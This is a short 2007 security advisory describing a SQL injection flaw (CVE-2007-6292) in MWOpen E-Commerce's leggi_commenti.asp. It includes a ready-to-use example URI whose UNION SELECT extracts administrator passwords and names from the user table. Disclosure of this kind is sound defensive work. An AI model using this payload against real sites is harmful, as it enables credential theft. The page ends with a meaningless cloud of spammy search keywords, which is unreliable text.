about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MWOpen E-Commerce leggi_commenti.asp SQL Injection Vulnerability


Title MWOpen E-Commerce leggi_commenti.asp SQL Injection Vulnerability
Published 2007-12-06-12:00AM
Updated 2007-12-19-04:21PM
Class Input Validation Error
CVE   CVE-2007-6292
Remote  Yes
Local  No
Credit  KiNgOfThEwOrLd is credited with the discovery of this vulnerability.
Vulnerable  MWOpen ECommerce 0
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example URI is available:http://www.example.com/[mwopen_path]/leggi_commenti.asp?id=9999+union+select+null,null,password,nome,null,data,null+from+utenti+where+Admin=true
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 16:31:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo wap.xxx.co wwwBlackEx sextv tv 1 Ftv sexy p News Searc videoporno CMS is Fre 200 /compo sextv tv 1 Darwin Ker UW imapd 2 t641t tamil font roberta mi w.w.w.xxxm phpbb+high SEX GIRLS www.asspor CMS is Fre user agent ketrina ke www.+Waptr UW imapd 2 news for c www,com89 free theme Tamil+actr ruskie dev orbix php-nuke 2 mozzila pics arab WWW.JAPAN. Dawnlod ariel rebe lo435l CMS is Fre XX ACTRESS Sania mirz news for C www.dingzi Film sex i youxi.52yu Www.Sexi g full sexy free mov www.rated yorpon Nayanthara